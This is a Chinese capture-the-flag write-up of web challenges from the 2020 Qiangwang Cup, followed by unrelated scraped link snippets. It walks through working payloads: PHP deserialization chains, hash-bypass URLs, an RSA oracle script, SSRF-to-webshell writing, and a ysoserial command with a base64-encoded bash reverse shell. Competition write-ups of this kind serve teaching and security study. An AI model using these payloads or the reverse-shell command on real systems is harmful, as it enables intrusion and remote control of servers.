BOBO爱吃菠萝
BOBO爱吃菠萝

php安全挑战赛,2020 第四届强网杯全国网络安全挑战赛Online Writeup

前言

近期的一个周末参加了强网杯线上赛,以下是web题解。

web辅助

类定义如下:

user = $user;

$this->pass = $pass;

$this->admin = $admin;

}

public function get_admin(){

return $this->admin;

}

}

class topsolo{

protected $name;

public function __construct($name = 'Riven'){

$this->name = $name;

}

public function TP(){

if (gettype($this->name) === "function" or gettype($this->name) === "object"){

$name = $this->name;

$name();

}

}

public function __destruct(){

$this->TP();

}

}

class midsolo{

protected $name;

public function __construct($name){

$this->name = $name;

}

public function __wakeup(){

if ($this->name !== 'Yasuo'){

$this->name = 'Yasuo';

echo "No Yasuo! No Soul!\n";

}

}

public function __invoke(){

$this->Gank();

}

public function Gank(){

if (stristr($this->name, 'Yasuo')){

echo "Are you orphan?\n";

}

else{

echo "Must Be Yasuo!\n";

}

}

}

class jungle{

protected $name = "";

public function __construct($name = "Lee Sin"){

$this->name = $name;

}

public function KS(){

system("cat /flag");

}

public function __toString(){

$this->KS();

return "";

}

}

?>

整体来说,链还是比较容易找到的:

topsolo -> __destruct -> TP -> $name() -> midsolo -> __invoke -> Gank -> stristr($this->name, 'Yasuo') -> jungle -> __toString -> KS

其中midsolo中有wakeup限制:

public function __wakeup(){

if ($this->name !== 'Yasuo'){

$this->name = 'Yasuo';

echo "No Yasuo! No Soul!\n";

}

}

不过也是老考点了,比较好绕过。关键点是2个:

$player = new player($username, $password);

file_put_contents("caches/".md5($_SERVER['REMOTE_ADDR']), write(serialize($player)));

首先我们对象需要逃逸,否则无法反序列化我们想要的对象,其次存在对象属性名过滤:

function check($data)

{

if(stristr($data, 'name')!==False){

die("Name Pass\n");

}

else{

return $data;

}

}

属性名过滤我们可以通过:

\6e\61\6d\65

来进行bypass,而对于对象逃逸,已经是之前考察过的考点了,可以参考:

https://www.cnblogs.com/Wanghaoran-s1mple/p/13160708.html

因此我们可以通过:

$user = '0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0';

$pass='0";s:7:"\0*\0pass";O:7:"topsolo":1:{S:7:"\0*\0\6e\61\6d\65";O:7:"midsolo":2:{S:7:"\0*\0\6e\61\6d\65";O:6:"jungle":1:{S:7:"\0*\0\6e\61\6d\65";s:7:"Lee Sin";}}}};';

访问:

http://eci-2zefq4smu487cmezc2u4.cloudeci1.ichunqiu.com/?username=0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0&password=0%22%3Bs%3A7%3A%22%5C0%2A%5C0pass%22%3BO%3A7%3A%22topsolo%22%3A1%3A%7BS%3A7%3A%22%5C0%2A%5C0%5C6e%5C61%5C6d%5C65%22%3BO%3A7%3A%22midsolo%22%3A2%3A%7BS%3A7%3A%22%5C0%2A%5C0%5C6e%5C61%5C6d%5C65%22%3BO%3A6%3A%22jungle%22%3A1%3A%7BS%3A7%3A%22%5C0%2A%5C0%5C6e%5C61%5C6d%5C65%22%3Bs%3A7%3A%22Lee+Sin%22%3B%7D%7D%7D%7D%3B

再触发反序列化:

http://eci-2zefq4smu487cmezc2u4.cloudeci1.ichunqiu.com/play.php

即可获取flag:

Funhash

query($query);

$row = $result->fetch_assoc();

var_dump($row);

$result->free();

$mysqli->close();

?>

题目源码如上,还是比较简单的,对于第一关可以使用0e开头的字符串,第二关可以使用数组,第三关则是一道老题,参考:

https://www.jianshu.com/p/12125291f50d

用ffifdyop即可。

因此最后可使用:

http://39.101.177.96/?hash1=0e251288019&hash2[]=2&hash3[]=1&hash4=ffifdyop

dice2cry

访问题目,发现cookie里放有rsa的信息:

php安全挑战赛,2020 第四届强网杯全国网络安全挑战赛Online Writeup_第1张图片

同时发现存在文件泄露:

http://106.14.66.189/abi.php.bak

源码如下:

$result);

$json_obj = json_encode($dice);

echo $json_obj;

?>

发现可以传递参数:

$_POST['this_is.able']

但是this_is.able传递时,点会被替换成下划线:

this_is.able -> this_is_able

因此需要想办法绕过,这里查看底层处理方式main/php_variables.c,可以得知:

php安全挑战赛,2020 第四届强网杯全国网络安全挑战赛Online Writeup_第2张图片

因此可以使用[来进行绕过,传参方式为:

this[is.able = xxxx

后面则是密码学的部分:

需要将:

https://crypto.stackexchange.com/questions/11053/rsa-least-significant-bit-oracle-attack

推广到mod 3的情况。

import requests

import json

from libnum import n2s

from fractions import Fraction

from Crypto.Util.number import*

url = 'http://106.14.66.189/abi.php'

c = 88611057676672840595766841579824069470206217129946135596214197506349717390763743327290683433946015480328468579057197141666127494006706093641604245416988006600651700656395596042499486504530580142311065863535717536001796279609016521570885772000690737095374160233594633294536318766991741757802548582282701543671

n=0x8f5dc00ef09795a3efbac91d768f0bff31b47190a0792da3b0d7969b1672a6a6ea572c2791fa6d0da489f5a7d743233759e8039086bc3d1b28609f05960bd342d52bffb4ec22b533e1a75713f4952e9075a08286429f31e02dbc4a39e3332d2861fc7bb7acee95251df77c92bd293dac744eca3e6690a7d8aaf855e0807a1157

e = 65537

def give_result_of_mod3(mm):

payload = str(mm)

data = {

'this[is.able':payload

}

Cookie = {

'PHPSESSID':'vpbteni7ahq83jh1chfs3kvug7',

'public_e':'010001',

'encrypto_flag':'88611057676672840595766841579824069470206217129946135596214197506349717390763743327290683433946015480328468579057197141666127494006706093641604245416988006600651700656395596042499486504530580142311065863535717536001796279609016521570885772000690737095374160233594633294536318766991741757802548582282701543671; public_n=8f5dc00ef09795a3efbac91d768f0bff31b47190a0792da3b0d7969b1672a6a6ea572c2791fa6d0da489f5a7d743233759e8039086bc3d1b28609f05960bd342d52bffb4ec22b533e1a75713f4952e9075a08286429f31e02dbc4a39e3332d2861fc7bb7acee95251df77c92bd293dac744eca3e6690a7d8aaf855e0807a1157'

}

r = requests.post(url=url,data=data,cookies=Cookie)

#print r.content

return int(json.loads(r.content)['num'])

def hack(c,e,n):

R = n%3

j = 1

exp3 = 3

length = n

low_bound = Fraction(0,1)

while length>1:

tmp_c = (pow(exp3,e,n)*c) % n

r = give_result_of_mod3(tmp_c)

k = (-r* inverse(R,3)) % 3

low_bound += Fraction(k*n,exp3)

exp3 *= 3

length = length//3

j +=1

return int(low_bound)

res = hack(c,e,n)

print(n2s(res))

得到flag:

flag{92ab3055092aad3e1856481091

half_infiltration

题目给出了源码:

age;

$boy = $this->sex;

$a = $this->num;

$student->$boy();

if(!(is_string($a)) ||!(is_string($boy)) || !(is_object($student)))

{

ob_end_clean();

exit();

}

global $$a;

$result=$GLOBALS['flag'];

ob_end_clean();

}

}

if (isset($_GET['x'])) {

unserialize($_GET['x'])->get_it();

}

题目存在ssrf.php,想要知道源码,就必须先获取$flag的值,观察类定义,只有一个destruct可用,其中存在3个关键点:

$student->$boy();

global $$a;

ob_end_clean();

首先可以调对象的任意方法,其次存在变量覆盖,我们可以global任意变量,最后有ob_end_clean,我们拿不到输出。

同时注意到:

unserialize($_GET['x'])->get_it()

如果单独传入类则会由于没有__call方法而报错。结合上述问题,这里我们考虑用如下方式进行bypass:

age = $a;

$b->sex = 'read';

$b->num = 'result';

$c = new User();

$c->age = $a;

$c->sex = 'read';

$c->num = 'this';

$d = serialize(array($b,$c));

echo urlencode($d);

可利用global $this出错:

让ob_end_clean无法清空缓冲区,从而获取输出:

< ?php

//经过扫描确认35000以下端口以及50000以上端口不存在任何内网服务,请继续渗透内网

$url = $_GET['we_have_done_ssrf_here_could_you_help_to_continue_it'] ?? false;

if(preg_match("/flag|var|apache|conf|proc|log/i" ,$url)){

die("");

}

if($url)

{

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_HEADER, 1);

curl_exec($ch);

curl_close($ch);

}

? >

通过:

http://39.98.131.124/ssrf.php?we_have_done_ssrf_here_could_you_help_to_continue_it=127.0.0.1

进行端口爆破,burp跑一遍,发现开放端口为40000:

http://39.98.131.124/ssrf.php?we_have_done_ssrf_here_could_you_help_to_continue_it=127.0.0.1:40000

php安全挑战赛,2020 第四届强网杯全国网络安全挑战赛Online Writeup_第3张图片

查看参数名为:

php安全挑战赛,2020 第四届强网杯全国网络安全挑战赛Online Writeup_第4张图片

猜想后端代码为:

file_put_contents($file,$content);

同时脑洞想到,文件上传目录为127.0.0.1:40000/uploads/PHPSESSID/

利用gopher传递数据,发现简单的使:

file=1.php&content=

会导致文件没有正常生成,原因应该是content被过滤了,简单测试,发现过滤了:

因此考虑使用伪协议写入内容,为避免过滤,直接选择了一个冷门的:

file=php://filter/convert.iconv.UCS-4LE.UCS-4*/resource=shell.php&content=hp?< pave@_$(l[TEG]"a">?;)

即可写入shell:

php安全挑战赛,2020 第四届强网杯全国网络安全挑战赛Online Writeup_第5张图片

尝试cat flag,但是发现存在open_basedir,这里使用一些常规的绕过方案:

php安全挑战赛,2020 第四届强网杯全国网络安全挑战赛Online Writeup_第6张图片

即可看到flag,读取即可。

easy_java

首先发现存在反序列化点:

php安全挑战赛,2020 第四届强网杯全国网络安全挑战赛Online Writeup_第7张图片

同时看到黑名单:

php安全挑战赛,2020 第四届强网杯全国网络安全挑战赛Online Writeup_第8张图片

发现未对JRMPListener做过滤,查看pom.xml:

php安全挑战赛,2020 第四届强网杯全国网络安全挑战赛Online Writeup_第9张图片

发现有commons-collections依赖,因此利用ysoserial来生成exp:

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 23334 CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eHgueHh4Lnh4eC54eHgvMjMzMzMgMD4mMQ==}|{base64,-d}|{bash,-i}"

php安全挑战赛,2020 第四届强网杯全国网络安全挑战赛Online Writeup_第10张图片

php安全挑战赛,2020 第四届强网杯全国网络安全挑战赛Online Writeup_第11张图片

即可反弹shell,并获取flag。

后记

你可能感兴趣的:(php安全挑战赛)

  • 第11届易趣玩国学思维打卡挑战赛结营仪式。(2) 雪霁晴空喜迎春
    高清秀老师:全场最爱学习最尊敬的大朋友小朋友们大家晚上好,非常感谢主持人的介绍,我是来自广州从化的高清秀,很荣幸在这个平台与大家一起学习成长,非常感谢毛老师,感谢德学书苑,也感谢统筹打卡活动,所有的义工老师们的付出,谢谢你们的大爱,你们辛苦了。本人呢,非常荣幸参加第11届一区玩国学思维打卡挑战赛,这也是我参加的第二届打卡活动,在这一届打卡学习当中,我还担任担任了讲师,那现在呢,就代表我们讲师组做一
  • 读书打卡100天 第五本书 向宇宙下订单 包租婆精进日记
    #不服,就来战##100天阅读打卡挑战赛#Day26第五本书#向宇宙下订单#图片发自App前言想想自己真正想要的是什么?1.我要花多少时间才能明白,我其实不需要这些东西,说不定我会花好几年的时间去追逐一堆切不实际的梦想,这些失误的愿望,让我及早接近我生命中真正想要的那些要素,不过,只要越常用你的心,倾听内心的声音,就越可以避免许下不必要的愿望。2.不需要进入催眠状态,调整呼吸,只需要好好思考,细心
  • 习惯置换坏习惯+能量将帅挑战赛——看场电影差点要了命!】 丽华_e2ab
    我怎么如此幸运佩服啾啾对子涵的提问客观具体的问题解析明白了对个体的振频扫描是否客观规律面前客观性我怎么如此幸运结束私聊班级群里开始搅动爱做到的孩子发食物图片爱收拾家务的发整理图片爱拍照的发景物图片再来点儿音乐早晨,就这样开启了!我怎么如此幸运下午去营业厅班级补卡手续被接待的依然是三个月前的服务人员这次再看她说话自然很和蔼可是口罩遮挡的脸显出了衰老程序需要拍照摘下口罩很配合的过程发觉在对方拍照镜头前
  • 地面咨询感悟 誩儿
    中原焦点团队黄静2021-2-3中16坚持分享第568天本周约练挑战第4次,第四次挑战赛总第29次,共463次,角色:咨询师。这个孩子是第四次咨询,也是出院前的最后一次,之前的几个个案都没有做结案,今天这个孩子可以结案了。经过治疗和咨询,目前来访者的躯体症状基本消失,生活作息规律,认知功能没有受到明显的影响,情绪平稳,整体评分已经达到8分,自己想出院,各方面情况也允许出院了。出院后的安排也井井有条
  • 皇室战争荒野乱斗挑战赛新手详细攻略 老六盟
    这次的活动还是挺有意思的,虽然跟选卡挑战赛很像,但是对战的场地不同,相应的游戏乐趣就增加了很多,下面给大家详细分析一下吧。1.首先呢,这次就是一场选卡挑战赛,开局选卡并没有什么不同,但是,好像出现了两个没见过的卡啊?其实就是猎人和游侠换了个皮肤,大家要注意,有犄角的是游侠,另一个是猎人,可不要选错了哈!同样的三败退场机制,不过每赢一场都可以获得钻石,一共可以获得250个,奖励算是很不错嘛。2.还有
  • Python爬虫基础总结 醉蕤 Pythonpython爬虫
    活动地址:CSDN21天学习挑战赛学习的最大理由是想摆脱平庸,早一天就多一份人生的精彩;迟一天就多一天平庸的困扰。学习日记目录学习日记一、关于爬虫1、爬虫的概念2、爬虫的优点3、爬虫的分类4、重要提醒5、反爬和反反爬机制6、协议7、常用请求头和常用的请求方法8、常见的响应状态码9、url的详解二、爬虫基本流程三、可能需要的库四、小例1、requests请求网页2、python解析网页源码(使用Be
  • Python基础库-JSON库 度假的小鱼 Python基础jsonjavascript开发语言python
    活动地址:CSDN21天学习挑战赛文章目录1JSON介绍1.1json介绍1.2json特点1.3json文件的处理1.4json语法规则1.5json键1.6json文件的书写1.7读取json文件的方法(json.load)1.8操作json文件常见错误1JSON介绍JSON的全称是JavaScriptObjectNotation",是JavaScript对象表示法,它是一种基于文本,独立于语
  • 2024 天池云原生编程挑战赛决赛名单公布,9 月 20 日开启终极答辩 阿里云云原生 云原生
    历时4个月,2024天池云原生编程挑战赛决赛名单公布!本届大赛规模创新高,参赛战队达20000+支,广覆盖国内外优秀高校和杰出企业!吸引了来自北京大学、清华大学等176所国内外优秀高校,以及美团、米哈游等120+家杰出企业选手参赛。重庆邮电大学计算机学院李逸雄在分享参赛感受时提到:参与大赛赛道三,写好GithubActionWorkflow,我提交了PR。但是这个PR不是一次性就被Merge的。这
  • 2024年MathorCup高校数学建模挑战赛(C题)深度剖析_建模完整过程+详细思路+代码全解析 Unicorn建模 数学建模python算法
    问题1本问题属于时间序列预测问题,其目标是对未来一段时期内的信息进行预测。因此可以采用基于时间序列的回归模型进行货量预测。具体而言,将首先分析时间序列的性质,然后构建回归模型,最后利用模型对未来30天每天及每小时的货量进行预测。【算法原理】(1)时间序列的性质时间序列实际上是一种随时间变化的连续数据,其特点主要体现在两个方面:趋势性和周期性。趋势性是指时间序列数据在长期内呈现出的增长或减小的趋势,
  • 【网络安全面经】渗透面经、安服面经、红队面经、hw面经应有尽有 这一篇真的够了 webfker from 0 to 1 githubgitjava
    目录面经牛客奇安信面经(五星推荐)牛客面经(推荐)渗透测试面经(推荐)渗透测试技巧计网面经SQL注入漏洞注入绕过XXE漏洞最强面经Github面经模拟面WEB安全PHP安全网络安全密码学一、青藤二、360三、漏洞盒子四、未知厂商五、长亭-红队六、qax七、天融信八、安恒九、长亭十、国誉网安十一、360-红队十二、天融信十三、长亭-2十四、360-2十五、极盾科技十六、阿里十七、长亭3十八、qax-
  • 第五届全国高校计算机能力挑战赛C++ 毛_毛 虫 算法数据结构
    总共五道编程题,都比较常见题目数目移植现有一个3∗3的整数矩阵tree,其中tree[r][c]代表r行c列区域的树木数量,树木的总数为9(矩阵各元素之和为9)。现需将树木进行移植,使得每个区域的树木数量都至少为1,请问最少移动次数为多少?注意:每次只能往上、下、左、右四个方向移动一个区域,每次移动一棵树。输入格式输入9个非负整数,代表矩阵各区域的初始树木数量。输出格式输出最少移动的次数。输入样例
  • 高校计算机能力挑战赛C++ inforx 高校计算机挑战赛算法
    20201.Excel表列名称由字母A~Z组成,列字母的规律如下:A、B、C.....Z、AA、AB......AZ、BA、BB.......ZZZZY、ZZZZZ.......输入:输入包含两个列名称字符串,长度均小于等于5。输出:输出:两个列名称之间共有多少列样例输入:AAAZ样例输出:242."九键拼音中数字与英文字母成对应关系:2--abc,3-def,4-ghi,5--jkl,6--mn
  • 一起剧本杀《推理挑战赛II》凶手是谁剧透+真相答案复盘解析攻略 VX搜_奶茶剧本杀
    本文为一起剧本杀《推理挑战赛II》剧本杀测评+部分真相复盘,获取完整真相复盘只需两步:①、关注微信公众号【奶茶剧本杀】→②、回复一起剧本杀《推理挑战赛II》即可获取查看一起剧本杀《推理挑战赛II》剧本杀真相答案复盘+凶手剧透:以下是玩家评测+部分关键证据,凶手,时间线,复盘解析,推理逻辑--------------------------------------------------------
  • 亲亲爱日记营打卡第6天。 a3f9a37dbeb0
    2021年2月6日,星期六。今天是儿子星恺参加哈佛零距离挑战赛,今天是七天争霸赛中的第三天,每天晚上7点半准时开始,赛时半小时左右,因为年会加个人活动,我前两次都没有陪伴身边,星恺的参赛课程均是我督促后才完成打卡的。同时为他愿意补救的行为点赞。吃完晚饭后,约上星恺一起去取预订的插花顺便想买些年货,七点十五分当我刚捧着着插花装车时,星恺提醒我妈妈说:“今晚的专注力课程时间快到了”。“啊!是喔,星恺你
  • 第七届MathorCup高校数学建模挑战赛-A题:基于改进的神经网络和混沌时间序列预测控制高炉炼铁过程 格图素书 大数据竞赛赛题解析数学建模神经网络人工智能
    目录摘要一.问题重述二.模型假设三.符号说明四.问题分析五.数据预处理5.1异常值剔除5.2归一化处理5.3预处理后的数据六.问题一模型的建立与求解6.1BP神经网络预测模型6.1.1输入层和输出层6.1.2训练集和验证集6.1.3三层BP神经网络结构6.1.4BP神经网络的参数6.1.6相关性分析6.2小波神经网络预测模型6.2.1小波神经网络的结构6.2.2小波神经网络的基函数6.2.3小波神
  • 格式字符串利用:Linux 实战探索 红云谈安全 单片机嵌入式硬件
    概括这篇博文介绍了夺旗挑战赛,该挑战赛是2024年picoCTF活动的一部分,该活动持续到2024年3月26日星期二。我们与NVISO的团队一起决定参加并应对尽可能多的挑战,最终在全球记分牌上获得了第130名的好成绩。我决定尝试专注于二进制利用挑战。虽然我学习了Corelan的Windows课程中的Stack&Heap利用,但Linux二进制利用对我来说相当新,这在试图填补知识空白的同时提供了一个
  • PHP面试题之三 (PHP高级部分)2021-09-15 一位先生_
    一、PHP核心技术1.写出一个能创建多级目录的PHP函数(新浪网技术部)2.写出smarty模板的特点(新浪网技术部)速度快,编译型,缓存技术,插件机制,强大的表现逻辑3.打开php.ini中的safe_mode,会影响哪些函数?至少说出6个。(新浪)safe_mode,php安全模式,它提供一个基本安全的共享环境,在一个有多个用户账户存在的php开发的web服务器上。当安全模式打开的时候,一些函
  • 一等奖,get~ 降谷零·ZERO c++笔记学习
    小小#信息素养大赛,拿捏~咱也是拿了个一等奖好吧~这次#桐乡之旅很成功,还顺便拿了个奖~虽然这个含金量没那么高,但也很开心~我会继续努力哒~#算法创意实践挑战赛#C++#编程#编程竞赛
  • 深度学习9--目标检测 在下小天n 深度学习深度学习目标检测人工智能
    1.概念介绍目标检测不仅可以检测数字,而且可以检测动物的种类、汽车的种类等。例如,自动驾驶车辆需要自动识别前方物体是车辆还是行人,需要自动识别道路两旁的指示牌和前方的红绿灯颜色。对于自动检测的算法,有两个要求,一个是快,一个是准。VOC是一个挑战赛,主要目的是识别真实场景中的一系列物体。交并比是交集与并集的比例。假设需要检测到其中“0”的位置。白色方框是人工标注的标准答案,也是想要预测的理想位置。
  • Datawhale零基础入门金融风控Task1 赛题理解 一缕阳光lyz python
    Task1赛题理解Tip:本次新人赛是Datawhale与天池联合发起的0基础入门系列赛事第四场——零基础入门金融风控之贷款违约预测挑战赛。赛题以金融风控中的个人信贷为背景,要求选手根据贷款申请人的数据信息预测其是否有违约的可能,以此判断是否通过此项贷款,这是一个典型的分类问题。通过这道赛题来引导大家了解金融风控中的一些业务背景,解决实际问题,帮助竞赛新人进行自我练习、自我提高。项目地址:http
  • 【腾讯技术答人挑战赛】答题赢iPad、Switch与海量鹅厂公仔~ 腾讯
    在当今数字化时代,技术的更新换代速度远超以往。程序员需不断主动学习、拓展知识边界、补齐技能短板以适应变化的市场需求,让自己在「存量」之余寻求新的「增量」时,更加游刃有余。腾讯云开发者社区诚邀你参与腾讯技术答人挑战赛,探索知识边界,书写属于你的技术传奇!题目涵盖AI、编程语言、数据结构、云计算、操作系统、网络协议等多个领域,帮助你发现自己在技术领域的知识盲区。表现出色的玩家将获得丰厚奖品如Switc
  • 【挑战赛24/1000】这个社会原本就不公平 芦苇草32
    图片发自App见:凡有的,还要加倍给他叫他多余;没有的,连他所有的也要夺过来。——《圣经》在币圈,最近有两个项目在做改革,天涯和。他们的形式和币乎相似,都是通过写文、点赞获得收益。然而他们的设计之间又有着微小而重要的差异,就是马太效应。天涯和的设计是在刻意强化马太效应,而币乎却是在限制马太效应。感:一个增强一个限制,决定了人们的行为,币乎人定时发文,提前做发文预告,点赞的人定好闹钟,准时守候就为抢
  • 蓝桥杯备赛情报收集 Unen030 蓝桥杯数据结构算法
    情报大纲正需竞赛大纲解析视频公开课回放46章,46h算法知识点思维导图VIP:官方视频题解+压轴题单+微信群?再看每日一题算法赛分入门赛/挑战赛比赛常有省赛无忧班320元,持续3月金牌选手精讲、微信国赛选手答疑、25场直播带练题VIP刷题会员90天/100元会员内容很有用?官方视频题解+压轴题单+微信群?视频题解压轴题单3000+算法题暂时不太需要框架等实战赛编程基础课,基础语言到框架专属客服&技
  • 速速报名,30万奖金不容错过!OpenTiny 挑战赛开发指南来咯~ 前端开源组件库低代码
    OpenTiny正在参加开放原子开源基金会的开源大赛,目前大赛活动正在火热进行中,报名截止时间是2024-03-15,还没上车的朋友们抓紧时间,报名参赛即有机会获得丰厚奖金,一等奖10万,总共30万。OpenTiny前端Web应用开发挑战赛报名链接:https://competition.atomgit.com/competitionInfo?id=341b80d53f...点击报名按钮即可报名参
  • 在你还没有能力的时候积攒人脉,效益基本为零 Dinah姐姐
    最近参加一个求职竞争力挑战赛,最后评分需要上交一个视频,并且邀请人观看点赞。本以为这是一件轻而易举的事,结果却让我瞠目结舌。自以为在大学期间通过社团和各种学习、实习平台结交了不少好友,可谓“人脉通达”,但是等我登录后台看结果时,才发现只有几十个人点赞,浏览过的也不到一百。让我感到一阵阵的心痛,朋友圈上千号人,干什么吃的?这不是一件多么难的事情,并且当别人有这样的请求时我也一定会去支持,可没想到我需
  • “AI”送祥瑞:“千帆杯”第一期10万大奖揭晓! 百度云人工智能开发者创新
    距离千帆杯AI原生应用开发挑战赛第一期赛题“游乐场排队规划助手”的发布,已经过去了整整14天。在为期一周的报名挑战时间内,我们汇总收到了近300+的作品提交,在专业的评审和仔细考量下,决胜出了第一期赛题TOP10选手。百度智能云千帆杯·AI原生应用开发挑战赛,旨在激发广大开发者的创意潜能,推动AI原生应用在中国市场的蓬勃发展。大赛以“创意无限·生成未来”为主题,紧密围绕当前AI技术的前沿动态和应用
  • 【挑战赛10/1000】为什么你需要三份收入? 芦苇草32
    图片.png见:今天见到一个观点:你需要三份收入:第一份收入:用于养家糊口,满足日常生活所需。第二份收入:来源于兴趣爱好也应该花在兴趣上。第三份收入:用于投资让自己老有所依。感:在今天的社会上,几乎每一个人都在感叹物价的飞涨,而每个月拿的却只有那点死工资,我们所领的薪水越来越无法满足我们的日常开销,生活捉襟见肘,更不用提梦想和远方了。看到作者张辉的观点忽然眼前一亮,好像看到了新生活的打开方式让人振
  • 千帆杯AI原生应用开发挑战赛,每期10万,等你而战! 致Great AI-native
    大赛介绍随着大模型技术的飞速发展,2024年将会成为AI原生应用爆发的元年,引领千行百业的创新变革。在这一时代背景下,百度智能云重磅推出千帆杯·AI原生应用开发挑战赛,旨在激发广大开发者的创意潜能,推动AI原生应用在中国市场的蓬勃发展。大赛以“创意无限·生成未来”为主题,紧密围绕当前AI技术的前沿动态和应用趋势,借助百度智能云千帆AppBuilder和ModelBuilder两大智能开发助手,鼓励
  • 闵月感恩日记Day17 邓闵月
    美好的一天,以感恩结束。1、感谢先生帮我们报名了这一次黄崖关长城8公里越野挑战赛,给我们调整自己的机会。我从来没有认为自己不行,所以我也给孩子带去满满的信心,我的孩子也从来没想过自己不行。2、感恩黄崖山庄宾馆的服务员,服务非常周到。我能感受到天津这十来年的变化,08年我来到天津的时候,我曾经感叹过,天津的服务……3、感恩这一次挑战赛的工作人员,每一个都是那种笑脸相迎,每一个笑容都是如此让人舒服。能
  • 【0基础学习mysql】之DQL-分页查询及执行顺序 天寒雨落 数据库学习mysql数据库
    CSDN话题挑战赛第2期参赛话题:学习笔记学习之路,长路漫漫,写学习笔记的过程就是把知识讲给自己听的过程。这个过程中,我们去记录思考的过程,便于日后复习,梳理自己的思路。学习之乐,独乐乐,不如众乐乐,把知识讲给更多的人听,何乐而不为呢?目录一、分页查询1.语法2.实例二、DQL执行顺序1.顺序2.实例小结1、基本查询1.查询多个字段2.查询所有字段3.设置别名4.去除重复的查询2.条件查询3.聚合
  • jsonp 常用util方法 hw1287789687 jsonpjsonp常用方法jsonp callback
    jsonp 常用java方法 (1)以jsonp的形式返回:函数名(json字符串) /*** * 用于jsonp调用 * @param map : 用于构造json数据 * @param callback : 回调的javascript方法名 * @param filters : <code>SimpleBeanPropertyFilter theFilt
  • 多线程场景 alafqq 多线程
    0 能不能简单描述一下你在java web开发中需要用到多线程编程的场景?0 对多线程有些了解,但是不太清楚具体的应用场景,能简单说一下你遇到的多线程编程的场景吗? Java多线程 2012年11月23日 15:41 Young9007 Young9007 4 0 0 4 Comment添加评论关注(2) 3个答案 按时间排序 按投票排序 0 0 最典型的如: 1、
  • Maven学习——修改Maven的本地仓库路径 Kai_Ge maven
          安装Maven后我们会在用户目录下发现.m2 文件夹。默认情况下,该文件夹下放置了Maven本地仓库.m2/repository。所有的Maven构件(artifact)都被存储到该仓库中,以方便重用。但是windows用户的操作系统都安装在C盘,把Maven仓库放到C盘是很危险的,为此我们需要修改Maven的本地仓库路径。    
  • placeholder的浏览器兼容 120153216 placeholder
    【前言】 自从html5引入placeholder后,问题就来了, 不支持html5的浏览器也先有这样的效果, 各种兼容,之前考虑,今天测试人员逮住不放, 想了个解决办法,看样子还行,记录一下。   【原理】 不使用placeholder,而是模拟placeholder的效果, 大概就是用focus和focusout效果。   【代码】 <scrip
  • debian_用iso文件创建本地apt源 2002wmj Debian
    1.将N个debian-506-amd64-DVD-N.iso存放于本地或其他媒介内,本例是放在本机/iso/目录下 2.创建N个挂载点目录 如下: debian:~#mkdir –r /media/dvd1 debian:~#mkdir –r /media/dvd2 debian:~#mkdir –r /media/dvd3 …. debian:~#mkdir –r /media
  • SQLSERVER耗时最长的SQL 357029540 SQL Server
    对于DBA来说,经常要知道存储过程的某些信息: 1.   执行了多少次 2.   执行的执行计划如何 3.   执行的平均读写如何 4.   执行平均需要多少时间 列名          &
  • com/genuitec/eclipse/j2eedt/core/J2EEProjectUtil 7454103 eclipse
    今天eclipse突然报了com/genuitec/eclipse/j2eedt/core/J2EEProjectUtil 错误,并且工程文件打不开了,在网上找了一下资料,然后按照方法操作了一遍,好了,解决方法如下: 错误提示信息: An error has occurred.See error log for more details. Reason: com/genuitec/
  • 用正则删除文本中的html标签 adminjun javahtml正则表达式去掉html标签
    使用文本编辑器录入文章存入数据中的文本是HTML标签格式,由于业务需要对HTML标签进行去除只保留纯净的文本内容,于是乎Java实现自动过滤。 如下: public static String Html2Text(String inputString) { String htmlStr = inputString; // 含html标签的字符串 String textSt
  • 嵌入式系统设计中常用总线和接口 aijuans linux 基础
                   嵌入式系统设计中常用总线和接口         任何一个微处理器都要与一定数量的部件和外围设备连接,但如果将各部件和每一种外围设备都分别用一组线路与CPU直接连接,那么连线
  • Java函数调用方式——按值传递 ayaoxinchao java按值传递对象基础数据类型
    Java使用按值传递的函数调用方式,这往往使我感到迷惑。因为在基础数据类型和对象的传递上,我就会纠结于到底是按值传递,还是按引用传递。其实经过学习,Java在任何地方,都一直发挥着按值传递的本色。   首先,让我们看一看基础数据类型是如何按值传递的。   public static void main(String[] args) { int a = 2;
  • ios音量线性下降 bewithme ios音量
    直接上代码吧   //second 几秒内下降为0 - (void)reduceVolume:(int)second { KGVoicePlayer *player = [KGVoicePlayer defaultPlayer]; if (!_flag) { _tempVolume = player.volume;
  • 与其怨它不如爱它 bijian1013 选择理想职业规划
            抱怨工作是年轻人的常态,但爱工作才是积极的心态,与其怨它不如爱它。         一般来说,在公司干了一两年后,不少年轻人容易产生怨言,除了具体的埋怨公司“扭门”,埋怨上司无能以外,也有许多人是因为根本不爱自已的那份工作,工作完全成了谋生的手段,跟自已的性格、专业、爱好都相差甚远。  
  • 一边时间不够用一边浪费时间 bingyingao 工作时间浪费
    一方面感觉时间严重不够用,另一方面又在不停的浪费时间。 每一个周末,晚上熬夜看电影到凌晨一点,早上起不来一直睡到10点钟,10点钟起床,吃饭后玩手机到下午一点。 精神还是很差,下午像一直野鬼在城市里晃荡。 为何不尝试晚上10点钟就睡,早上7点就起,时间完全是一样的,把看电影的时间换到早上,精神好,气色好,一天好状态。 控制让自己周末早睡早起,你就成功了一半。 有多少个工作
  • 【Scala八】Scala核心二:隐式转换 bit1129 scala
    Implicits work like this: if you call a method on a Scala object, and the Scala compiler does not see a definition for that method in the class definition for that object, the compiler will try to con
  • sudoku slover in Haskell (2) bookjovi haskellsudoku
    继续精简haskell版的sudoku程序,稍微改了一下,这次用了8行,同时性能也提高了很多,对每个空格的所有解不是通过尝试算出来的,而是直接得出。   board = [0,3,4,1,7,0,5,0,0, 0,6,0,0,0,8,3,0,1, 7,0,0,3,0,0,0,0,6, 5,0,0,6,4,0,8,0,7,
  • Java-Collections Framework学习与总结-HashSet和LinkedHashSet BrokenDreams linkedhashset
            本篇总结一下两个常用的集合类HashSet和LinkedHashSet。         它们都实现了相同接口java.util.Set。Set表示一种元素无序且不可重复的集合;之前总结过的java.util.List表示一种元素可重复且有序
